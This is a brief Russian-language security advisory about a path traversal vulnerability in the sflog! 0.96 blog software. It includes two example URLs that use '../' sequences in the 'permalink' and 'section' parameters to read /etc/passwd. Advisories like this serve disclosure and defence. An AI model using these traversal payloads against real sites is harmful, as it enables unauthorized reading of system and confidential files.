Программа: sflog! 0.96

Уязвимость позволяет удаленному злоумышленнику получить несанкционированный доступ к конфиденциальной информации на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в параметре «blog». Атакующий может получить несанкционированный доступ к конфиденциальной информации на целевой системе.

Пример:

http://localhost/sflog/?blog=test&permalink=../../../../../../../../../../etc/passwd
http://localhost/sflog/index.php?blog=test&section=../../../../../../../../../../etc/passwd
 



Оставить мнение